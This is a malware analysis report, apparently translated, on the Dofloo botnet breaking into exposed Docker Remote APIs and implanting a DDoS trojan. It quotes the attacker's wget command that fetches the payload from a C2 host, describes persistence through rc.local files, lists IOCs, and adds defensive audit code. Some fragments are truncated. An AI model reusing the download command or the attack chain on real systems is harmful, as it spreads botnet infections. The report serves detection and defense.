
Dofloo (AESDDoS) botnet is batch-scanning and attacking Docker containers


This Wind


Summary: the Dofloo botnet trojan is implanted and steals user information.

I. Background

Tencent Security Threat Intelligence Center has detected the Dofloo (AESDDoS) botnet batch-scanning and attacking Docker containers. Some Docker deployments on cloud hosts have no authentication on remote access: the Docker Remote API is exposed to the public internet and allows unauthorized use, so attackers break in through it and implant the Dofloo botnet trojan. Once the trojan is implanted, the compromised cloud host leaks sensitive information, receives C2 commands and carries out DDoS attacks.

With the rise of cloud computing, adding server hardware became very easy and deploying software services became the bottleneck. Docker, as an open-source engine, can easily create a lightweight, portable, self-sufficient container for any application, and so has gradually come into wide use. When developers deploy Docker without configuring the related services correctly, it becomes one of the easier intrusion paths for attackers; a case of H2Miner exploiting a Docker weakness to break in and mine cryptocurrency has been disclosed before (

II. Detailed analysis

In this attack, the attacker first batch-scans a given IP range by sending TCP SYN packets to port 2375 (the default port for communicating with the Docker daemon). After identifying target IPs with the port open, the attacker sends a request to the /containers/json endpoint to obtain the list of running containers, then uses Docker EXEC to run the following shell command in every running container on the exposed host to download the trojan Linux2.7.

Obtaining the container list:

Figure 1

Using Docker EXEC against the running containers to execute the trojan download command:

wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

Figure 2

The downloaded Dofloo botnet trojan Linux2.7 connects to 49.235.238.111:48080 to send and receive remote shell commands from the attacker.

Figure 3

Figure 4

The Dofloo botnet also steals information from the infected system, including the operating system version and the CPU model, speed and type.

Figure 5

It adds itself as a startup item by writing its own path into the files /etc/rc.local, /etc/rc.d/rc.local and /etc/init.d/boot.local.

Figure 6
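Two defender-side checks for the behaviour described in the detailed analysis above (the exposed, unauthenticated Docker Remote API on port 2375) and for the autostart persistence just described; this is an added example, not code from the original report. It assumes a standard dockerd daemon.json (the `hosts`, `tls` and `tlsverify` keys) and uses constructed sample inputs.

```python
import json
import re
from typing import List

# Added example (not the report's code): audit helpers for the two weaknesses
# the analysis describes. All sample inputs below are constructed.

# Persistence files named in the analysis and the report's listed IP indicators.
PERSISTENCE_FILES = ("/etc/rc.local", "/etc/rc.d/rc.local", "/etc/init.d/boot.local")
IOC_IPS = {"49.235.238.111", "89.40.73.126", "175.24.123.205"}


def docker_api_exposed(daemon_json: str) -> List[str]:
    """Return findings for a daemon.json that listens on TCP without TLS."""
    cfg = json.loads(daemon_json)
    tls_on = bool(cfg.get("tlsverify") or cfg.get("tls"))
    findings = []
    for host in cfg.get("hosts", []):
        # A tcp:// listener with no TLS is exactly what the port-2375 scan looks for.
        if host.startswith("tcp://") and not tls_on:
            findings.append(f"unauthenticated Docker Remote API listener: {host}")
    return findings


def suspicious_autostart(path: str, content: str) -> List[str]:
    """Flag rc.local-style entries that launch binaries from /tmp or name IOC IPs."""
    hits = []
    for line in content.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or s.startswith("exit"):
            continue
        if re.search(r"(^|\s)/tmp/\S+", s) or any(ip in s for ip in IOC_IPS):
            hits.append(f"{path}: {s}")
    return hits


# Constructed samples: a misconfigured daemon.json and an rc.local carrying the implant.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAMPLE_RC_LOCAL = "#!/bin/sh -e\n/tmp/Linux2.7\nexit 0\n"

if __name__ == "__main__":
    for finding in docker_api_exposed(SAMPLE_DAEMON_JSON):
        print("[!]", finding)
    for hit in suspicious_autostart(PERSISTENCE_FILES[0], SAMPLE_RC_LOCAL):
        print("[!]", hit)
```

On a real host, feed `docker_api_exposed` the contents of /etc/docker/daemon.json and run `suspicious_autostart` over each file in `PERSISTENCE_FILES`; a dockerd started with `-H tcp://...` on the command line is not covered by the daemon.json check.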

The stolen system information and the command-and-control (C&C) data are encrypted with the AES algorithm.

Figure 7

This Dofloo variant can launch various types of DDoS attacks, including DNS, SYN, LSYN, UDP, UDPS, TCP and CC floods.

Figure 8

IOCs

C&C

49.235.238.111:48080

175.24.123.205:48080

IP

49.235.238.111

89.40.73.126

175.24.123.205

URL


MD5


Reference links:
